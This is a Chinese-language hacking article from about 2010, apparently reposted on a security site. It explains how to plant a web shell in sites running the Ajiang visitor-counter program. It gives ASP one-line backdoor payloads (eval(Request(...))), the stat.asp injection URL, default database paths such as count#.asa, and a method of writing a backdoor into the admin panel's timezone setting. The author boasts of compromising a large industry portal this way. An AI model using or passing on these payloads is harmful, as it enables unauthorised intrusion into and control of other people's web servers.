首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
阿江统计系统拿WebShell
来源:vfocus.net 作者:情魔 发布时间:2010-04-15  
一般两种方法:
第一:
前提知道数据库路经,并且改成asp或asa后缀!阿江计数 程序,可以通过
http://网站 /stat.asp?style=text&referer=代码内容&screenwidth=1024
直 接提交,即可把代码内容直接插入到计数系统的数据库中,而此系统默认数据库为count#.asa,我们可以通过http://网站 /count%23.asa访问得到webshell。
由于阿江计数程序过滤了%和+,将最小马改成
<SCRIPT RUNAT=SERVER LANGUAGE=vbSCRIPT>eval(Request(“1″))</SCRIPT>
替换代码 内容处提交,然后用一句话来提交,值得一提的是如果进到计数后台,可以清理某时某刻的数据,一旦插入asp木马失败,可以清理数据库再次操作。某私服内的 啊江统计程序默认的数据库count#.asa
第二:
是进了后台拿shell ,一般有人进了后台不知道怎么搞!
那我情魔就分享下 在系统管理的全局选项中
有个2、服务器所在时区 在里面一般有个8 我们在后面写进 :Eval(request(chr(49)))
成 为 8:Eval(request(chr(49))) 这里49是对应的CHR码你也可以换其他的密码
49对应的是 1 密码就是 1 以前我好象也看到过:Eval(request(chr(112)))什么的 112是p
不过都是转载抄袭写的,写的不明白!
然 后确认修改 我们就用一经常话可以连接了地址是 count/inc_config.asp
http://www.XXX.com/count/inc_config.asp
就 这样OK了!….这方法我曾拿下全国阀门大型门户网..
以上作者:情魔
附:阿江部分默认数据库:count#.asa、#aj.asp(下 载时#号要改为%23)

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·Uchome <=2.0 后台GetWebShell漏
·重建sp_makewebtask存储过程获取
·八卦下tx分站被黑
·著名国际黑客站点zone-h.org被黑
·xxbing的一次日站过程
·最新DVBBS8.0以上版本后台拿webs
·入侵本地Mac OS X方针与技巧
·QQ2009 本地聊天记录的查看
·总结搜索型手工注入的全过程(不
·百度游戏的一些安全隐患
·Discuz! v7.2 注入漏洞分析与利
·入侵联通全过程
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved